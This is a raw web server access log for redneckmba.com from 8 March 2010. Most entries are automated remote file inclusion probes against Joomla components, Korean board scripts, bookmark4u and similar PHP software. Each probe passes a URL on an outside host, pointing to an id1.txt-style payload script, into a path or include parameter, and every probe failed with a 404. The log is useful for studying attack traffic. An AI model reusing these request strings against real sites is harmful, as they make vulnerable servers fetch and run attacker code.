87.106.132.3 - - [08/Mar/2010:20:00:12 -0800] "GET /admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:20:00:12 -0800] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:20:00:19 -0800] "GET /admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:20:00:19 -0800] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:20:00:19 -0800] "GET /logs/access.log%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:20:00:39 -0800] "GET /logs/access.log%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:20:00:39 -0800] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:20:00:39 -0800] "GET /admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [08/Mar/2010:20:00:59 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://demo.njipn.com/mambots/system/idtasikfeel.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [08/Mar/2010:20:00:59 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://demo.njipn.com/mambots/system/idtasikfeel.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
220.80.108.81 - - [08/Mar/2010:20:00:59 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://demo.njipn.com/mambots/system/idtasikfeel.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:20:03:15 -0800] "GET /admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:20:03:15 -0800] "GET /logs/access.log%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:20:03:15 -0800] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:20:03:53 -0800] "GET /logs/access.log%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:20:03:53 -0800] "GET /admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:20:03:53 -0800] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [08/Mar/2010:20:09:57 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:20:10:38 -0800] "GET /logs/access.log///?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:20:10:37 -0800] "GET /logs/access.log///?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:20:11:24 -0800] "GET /logs/access.log///?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.207 - - [08/Mar/2010:20:18:15 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
69.175.71.114 - - [08/Mar/2010:20:22:11 -0800] "GET /logs/access_100111.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
69.175.71.114 - - [08/Mar/2010:20:22:11 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
69.175.71.114 - - [08/Mar/2010:20:22:11 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
206.123.108.110 - - [08/Mar/2010:20:24:47 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
206.123.108.110 - - [08/Mar/2010:20:24:47 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
206.123.108.110 - - [08/Mar/2010:20:24:47 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:24:59 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:24:59 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:24:59 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:25:01 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:25:01 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:25:01 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:25:02 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:25:02 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:25:02 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:26:00 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:26:00 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:26:00 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:26:00 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:26:00 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:26:00 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
69.175.71.114 - - [08/Mar/2010:20:26:00 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
69.175.71.114 - - [08/Mar/2010:20:26:00 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
69.175.71.114 - - [08/Mar/2010:20:26:00 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:26:01 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:26:01 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:20:26:01 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
206.123.108.110 - - [08/Mar/2010:20:26:07 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
206.123.108.110 - - [08/Mar/2010:20:26:07 -0800] "GET /logs/access_100111.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
206.123.108.110 - - [08/Mar/2010:20:26:07 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
206.123.108.110 - - [08/Mar/2010:20:27:23 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
69.175.71.114 - - [08/Mar/2010:20:28:01 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.105 - - [08/Mar/2010:20:37:34 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
194.39.140.100 - - [08/Mar/2010:20:40:16 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
194.39.140.100 - - [08/Mar/2010:20:40:16 -0800] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
194.39.140.100 - - [08/Mar/2010:20:40:16 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [08/Mar/2010:20:42:50 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
61.100.181.218 - - [08/Mar/2010:20:45:38 -0800] "GET /logs/access.log//delete.php/?board_skin_path=http://4eye.co.kr//data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [08/Mar/2010:20:45:38 -0800] "GET /logs//delete.php/?board_skin_path=http://4eye.co.kr//data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [08/Mar/2010:20:45:38 -0800] "GET /delete.php/?board_skin_path=http://4eye.co.kr//data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
194.39.140.100 - - [08/Mar/2010:20:47:47 -0800] "GET /logs/access.log/////skin/ggambo7002_board/comment_modify.php?dir=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.150.205.155 - - [08/Mar/2010:20:51:56 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.redneckmba.com"
219.150.205.156 - - [08/Mar/2010:20:51:56 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.redneckmba.com"
219.150.205.156 - - [08/Mar/2010:20:51:56 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.redneckmba.com"
219.150.205.156 - - [08/Mar/2010:20:54:11 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "redneckmba.com"
219.150.205.155 - - [08/Mar/2010:20:54:11 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "redneckmba.com"
219.150.205.156 - - [08/Mar/2010:20:54:16 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "redneckmba.com"
66.163.171.206 - - [08/Mar/2010:20:56:38 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
82.76.12.197 - - [08/Mar/2010:20:59:25 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://alice-t.dk/cache/indc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
82.76.12.197 - - [08/Mar/2010:20:59:27 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://alice-t.dk/cache/indc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
82.76.12.197 - - [08/Mar/2010:20:59:27 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://alice-t.dk/cache/indc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:21:00:03 -0800] "GET /download.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:21:00:03 -0800] "GET /logs/access.log/download.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:21:00:03 -0800] "GET /logs/download.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:21:00:57 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:21:00:57 -0800] "GET /logs/write_update.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:21:00:57 -0800] "GET /write_update.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.107 - - [08/Mar/2010:21:05:14 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.205.50.6 - - [08/Mar/2010:21:06:19 -0800] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://plasticfrog.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.205.50.6 - - [08/Mar/2010:21:06:19 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://plasticfrog.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.205.50.6 - - [08/Mar/2010:21:06:19 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://plasticfrog.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:21:10:15 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:21:10:15 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:21:10:17 -0800] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:21:10:44 -0800] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:21:10:45 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:21:10:47 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:21:12:38 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:21:12:42 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:21:12:43 -0800] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
210.116.122.95 - - [08/Mar/2010:21:16:19 -0800] "GET /write_comment_update.php?board_skin_path=http://www.canaan0675.or.kr/board/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.redneckmba.com"
201.218.209.245 - - [08/Mar/2010:21:32:40 -0800] "GET /logs/access.log//spaw_control.class.php?spaw_root=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
201.218.209.245 - - [08/Mar/2010:21:32:40 -0800] "GET /spaw_control.class.php?spaw_root=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [08/Mar/2010:21:32:53 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.206 - - [08/Mar/2010:21:34:38 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:21:37:30 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:21:37:30 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:21:37:30 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:21:39:37 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:21:39:37 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:21:39:37 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:21:39:40 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:21:39:40 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:21:39:40 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.195 - - [08/Mar/2010:21:48:21 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [08/Mar/2010:22:02:18 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
61.100.181.218 - - [08/Mar/2010:22:03:57 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://4eye.co.kr//data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [08/Mar/2010:22:03:57 -0800] "GET /logs/access_091012.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://4eye.co.kr//data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.100.181.218 - - [08/Mar/2010:22:03:57 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://4eye.co.kr//data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
75.119.216.146 - - [08/Mar/2010:22:05:07 -0800] "GET //include/bbs.lib.inc.php?site_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
75.119.216.146 - - [08/Mar/2010:22:05:07 -0800] "GET /logs///include/bbs.lib.inc.php?site_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
75.119.216.146 - - [08/Mar/2010:22:05:07 -0800] "GET /logs/access.log///include/bbs.lib.inc.php?site_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.122.197.10 - - [08/Mar/2010:22:07:12 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://smkn-13bdg.sch.id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.122.197.10 - - [08/Mar/2010:22:07:12 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://smkn-13bdg.sch.id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.122.197.10 - - [08/Mar/2010:22:07:12 -0800] "GET /logs/access.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://smkn-13bdg.sch.id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
